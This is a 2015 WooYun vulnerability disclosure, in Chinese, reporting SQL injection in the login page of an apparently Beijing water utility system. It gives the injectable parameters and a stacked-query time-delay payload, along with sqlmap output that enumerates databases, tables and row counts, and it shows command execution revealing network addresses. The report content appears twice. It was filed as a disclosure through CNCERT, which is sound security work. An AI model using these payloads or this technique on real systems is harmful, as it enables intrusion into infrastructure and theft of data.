当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146128

漏洞标题:北京水厂某系统sql注入(威胁内网\DBA权限\百万数据泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: mtfly

提交时间:2015-10-14 11:19

修复时间:2015-12-02 22:32

公开时间:2015-12-02 22:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-18: 厂商已经确认,细节仅向厂商公开
2015-10-28: 细节向核心白帽子及相关领域专家公开
2015-11-07: 细节向普通白帽子公开
2015-11-17: 细节向实习白帽子公开
2015-12-02: 细节向公众公开

简要描述:

北京水厂某系统sql注入(威胁内网\DBA权限\百万数据泄露)

详细说明:

**.**.**.**/bjwater2/login.jsp
登录框post基于时间的盲注
**.**.**.**:80/bjwater2/servlet/LoginSL (POST)
adminName=1p1sywpD&adminPWD=1&isDxLogin=true&loginType=pw_new
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [9]:
[*] bjwater
[*] bjwater2
[*] bjwater2_t
[*] BJWATER_SHOW
[*] bjwater_trans2
[*] master
[*] model
[*] msdb
[*] tempdb
八百万的数据,这应该是监测点什么的?没有跑数据,这些表名就跑了一天。
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: adminName (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: adminName=1p1sywpD';WAITFOR DELAY '0:0:5'--&adminPWD=1&isDxLogin=true&loginType=pw_new
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
Database: bjwater
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.V_WATERUSE_BASE | 8682624 |
| dbo.RD_PLAN_EXECUTE | 6403818 |
| dbo.TAP | 5115468 |
| dbo.PLAN_NORMAL | 4178197 |
| dbo.V_PLAN_NORMAL | 4178197 |
| dbo.WATERUSE_METER | 3174025 |
| dbo.PLAN_YEAR_NEW | 2683608 |
| dbo.WATERUSE | 2432582 |
| dbo.WATERUSE_BALANCED | 2196173 |
| dbo.RD_WATERUSE | 1184342 |
| dbo.WATERUSE_CHECK | 1083539 |
| dbo.WATERUSE_PLAN | 917326 |
| dbo.RD_PLAN_EXECUTE_2010S | 627775 |
| dbo.WATERUSE_ADJUST | 395789 |
| dbo.PLAN_NORMAL_C | 351444 |
| dbo.PLAN_YEAR_TEMP | 332471 |
| dbo.PLAN_EXECUTE_REMIND | 280423 |
| dbo.V_WATERUSE_ADJUST | 255668 |
| dbo.PLAN_TEMPORARY | 192146 |
| dbo.V_PLAN_TEMPORARY | 192146 |
| dbo.PLAN_YEAR_TEMP_C | 189787 |
| dbo.PLAN_PERENNIAL | 165871 |
| dbo.V_PLAN_PERENNIAL | 165871 |
| dbo.PLAN_EXECUTE_PRINT | 153610 |
| dbo.PLAN_YEAR | 104972 |
| dbo.COMPANY_TRACE | 77078 |
| dbo.METER | 62579 |
| dbo.COMPANY | 45222 |
| dbo.STAT_YEAR | 43329 |
| dbo.V_STAT_YEAR | 43327 |
| dbo.RD_STAT_YEAR | 43302 |
| dbo.RATION_ITEM_INFO | 40088 |
| dbo.LOGIN_LOG | 40081 |
| dbo.RATION_BASE_INFO | 34304 |
| dbo.V_WATERUSE_2005 | 29829 |
| dbo.WATERUSE_2005 | 29829 |
| dbo.S_WATERUSE | 27192 |
| dbo.PURVIEW_CLIENT | 25659 |
| dbo.WATERUSE_IMPORT | 24843 |
| dbo.WATERUSE_IMPORT2 | 23143 |
| dbo.WELL | 22569 |
| dbo.METER_TRACE | 13912 |
| dbo.PLAN_ADJUST_REASON | 12548 |
| dbo.FEE_MONTH_REPORT | 11576 |
| dbo.CHARGABLE_FEE | 11326 |
| dbo.PURVIEW | 9013 |
| dbo.PLAN_2006_INFO | 7861 |
| dbo.WF_YEARINFO | 3907 |
| dbo.PLAN_COMPANY_BASE_INFO | 3634 |
| dbo.S_PLAN_NORMAL | 3177 |
| dbo.TECH | 2790 |
| dbo.RD_TECH | 2719 |
| dbo.LOCKED_TABLE | 2270 |
| dbo.REUSED_WATER_YEAR | 1968 |
| dbo.S_STAT_YEAR | 1748 |
| dbo.PLAN_AGRO | 1680 |
| dbo.dinge | 1537 |
| dbo.OVERFEE | 1330 |
| dbo.STAT235 | 1298 |
| dbo.DM | 1186 |
| dbo.DESCRIPTION | 1128 |
| dbo.S_BIGCOMPANY | 860 |
| dbo.S_TECH | 840 |
| dbo.NOTICE | 793 |
| dbo.COMPANY_FEE_INFO | 774 |
| dbo.REUSED_WATER | 702 |
| dbo.OVER_FEE_REPORT | 660 |
| dbo.daxingstat | 633 |
| dbo.S_REUSED_WATER | 471 |
| dbo.NONPLAN | 344 |
| dbo.FEE_CHECK | 326 |
| dbo.ADMIN | 240 |
| dbo.FUNCTIONS_CLIENT | 230 |
| dbo.S_OVER_FEE_REPORT | 192 |
| dbo.PLAN_JSB | 168 |
| dbo.YEAR_REPORT2 | 168 |
| dbo.FUNCTIONS | 152 |
| dbo.YEAR_REPORT | 150 |
| dbo.SAVE_WATER | 149 |
| dbo.S_IMAGE | 141 |
| dbo.RW_OTHER_QR | 135 |
| dbo.RD_OVERFEE | 125 |
| dbo.FUNCTIONS_CLIENT_TABLE | 99 |
| dbo.JSB_WATERKIND | 96 |
| dbo.shishu | 88 |
| dbo.WF_BASEINFO | 74 |
| dbo.REPORT_HEAD | 70 |
| dbo.BASETABLE_PERIOD | 48 |
| dbo.S_SAVE_WATER | 48 |
| dbo.S_YEAR_REPORT | 45 |
| dbo.COMPRESS_RATIO | 39 |
| dbo.RW_SIGHT_QR | 37 |
| dbo.TECH11 | 31 |
| dbo.FOUR_RATE | 29 |
| dbo.SF_YEARINFO | 24 |
| dbo.PLAN_COMPUTE_DESCRIPTION | 19 |
| dbo.SF_BASEINFO | 8 |
| dbo.S_GDP_WATER | 2 |
+------------------------------+---------+
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
command standard output:
---
IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**
IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**

IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**
IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**
涉及内网,并且是dba权限,system权限(记录没找到,就不贴了)
可内网渗透,手里没有好用的马,点到为止了。

漏洞证明:

**.**.**.**/bjwater2/login.jsp
登录框post基于时间的盲注
**.**.**.**:80/bjwater2/servlet/LoginSL (POST)
adminName=1p1sywpD&adminPWD=1&isDxLogin=true&loginType=pw_new
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [9]:
[*] bjwater
[*] bjwater2
[*] bjwater2_t
[*] BJWATER_SHOW
[*] bjwater_trans2
[*] master
[*] model
[*] msdb
[*] tempdb
八百万的数据,这应该是监测点什么的?没有跑数据,这些表名就跑了一天。
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: adminName (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: adminName=1p1sywpD';WAITFOR DELAY '0:0:5'--&adminPWD=1&isDxLogin=true&loginType=pw_new
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
Database: bjwater
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.V_WATERUSE_BASE | 8682624 |
| dbo.RD_PLAN_EXECUTE | 6403818 |
| dbo.TAP | 5115468 |
| dbo.PLAN_NORMAL | 4178197 |
| dbo.V_PLAN_NORMAL | 4178197 |
| dbo.WATERUSE_METER | 3174025 |
| dbo.PLAN_YEAR_NEW | 2683608 |
| dbo.WATERUSE | 2432582 |
| dbo.WATERUSE_BALANCED | 2196173 |
| dbo.RD_WATERUSE | 1184342 |
| dbo.WATERUSE_CHECK | 1083539 |
| dbo.WATERUSE_PLAN | 917326 |
| dbo.RD_PLAN_EXECUTE_2010S | 627775 |
| dbo.WATERUSE_ADJUST | 395789 |
| dbo.PLAN_NORMAL_C | 351444 |
| dbo.PLAN_YEAR_TEMP | 332471 |
| dbo.PLAN_EXECUTE_REMIND | 280423 |
| dbo.V_WATERUSE_ADJUST | 255668 |
| dbo.PLAN_TEMPORARY | 192146 |
| dbo.V_PLAN_TEMPORARY | 192146 |
| dbo.PLAN_YEAR_TEMP_C | 189787 |
| dbo.PLAN_PERENNIAL | 165871 |
| dbo.V_PLAN_PERENNIAL | 165871 |
| dbo.PLAN_EXECUTE_PRINT | 153610 |
| dbo.PLAN_YEAR | 104972 |
| dbo.COMPANY_TRACE | 77078 |
| dbo.METER | 62579 |
| dbo.COMPANY | 45222 |
| dbo.STAT_YEAR | 43329 |
| dbo.V_STAT_YEAR | 43327 |
| dbo.RD_STAT_YEAR | 43302 |
| dbo.RATION_ITEM_INFO | 40088 |
| dbo.LOGIN_LOG | 40081 |
| dbo.RATION_BASE_INFO | 34304 |
| dbo.V_WATERUSE_2005 | 29829 |
| dbo.WATERUSE_2005 | 29829 |
| dbo.S_WATERUSE | 27192 |
| dbo.PURVIEW_CLIENT | 25659 |
| dbo.WATERUSE_IMPORT | 24843 |
| dbo.WATERUSE_IMPORT2 | 23143 |
| dbo.WELL | 22569 |
| dbo.METER_TRACE | 13912 |
| dbo.PLAN_ADJUST_REASON | 12548 |
| dbo.FEE_MONTH_REPORT | 11576 |
| dbo.CHARGABLE_FEE | 11326 |
| dbo.PURVIEW | 9013 |
| dbo.PLAN_2006_INFO | 7861 |
| dbo.WF_YEARINFO | 3907 |
| dbo.PLAN_COMPANY_BASE_INFO | 3634 |
| dbo.S_PLAN_NORMAL | 3177 |
| dbo.TECH | 2790 |
| dbo.RD_TECH | 2719 |
| dbo.LOCKED_TABLE | 2270 |
| dbo.REUSED_WATER_YEAR | 1968 |
| dbo.S_STAT_YEAR | 1748 |
| dbo.PLAN_AGRO | 1680 |
| dbo.dinge | 1537 |
| dbo.OVERFEE | 1330 |
| dbo.STAT235 | 1298 |
| dbo.DM | 1186 |
| dbo.DESCRIPTION | 1128 |
| dbo.S_BIGCOMPANY | 860 |
| dbo.S_TECH | 840 |
| dbo.NOTICE | 793 |
| dbo.COMPANY_FEE_INFO | 774 |
| dbo.REUSED_WATER | 702 |
| dbo.OVER_FEE_REPORT | 660 |
| dbo.daxingstat | 633 |
| dbo.S_REUSED_WATER | 471 |
| dbo.NONPLAN | 344 |
| dbo.FEE_CHECK | 326 |
| dbo.ADMIN | 240 |
| dbo.FUNCTIONS_CLIENT | 230 |
| dbo.S_OVER_FEE_REPORT | 192 |
| dbo.PLAN_JSB | 168 |
| dbo.YEAR_REPORT2 | 168 |
| dbo.FUNCTIONS | 152 |
| dbo.YEAR_REPORT | 150 |
| dbo.SAVE_WATER | 149 |
| dbo.S_IMAGE | 141 |
| dbo.RW_OTHER_QR | 135 |
| dbo.RD_OVERFEE | 125 |
| dbo.FUNCTIONS_CLIENT_TABLE | 99 |
| dbo.JSB_WATERKIND | 96 |
| dbo.shishu | 88 |
| dbo.WF_BASEINFO | 74 |
| dbo.REPORT_HEAD | 70 |
| dbo.BASETABLE_PERIOD | 48 |
| dbo.S_SAVE_WATER | 48 |
| dbo.S_YEAR_REPORT | 45 |
| dbo.COMPRESS_RATIO | 39 |
| dbo.RW_SIGHT_QR | 37 |
| dbo.TECH11 | 31 |
| dbo.FOUR_RATE | 29 |
| dbo.SF_YEARINFO | 24 |
| dbo.PLAN_COMPUTE_DESCRIPTION | 19 |
| dbo.SF_BASEINFO | 8 |
| dbo.S_GDP_WATER | 2 |
+------------------------------+---------+
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
command standard output:
---
IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**
IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**

IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**
IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**
涉及内网,并且是dba权限,system权限(记录没找到,就不贴了)
可内网渗透,手里没有好用的马,点到为止了。

修复方案:

过滤

版权声明:转载请注明来源 mtfly@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-18 22:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评价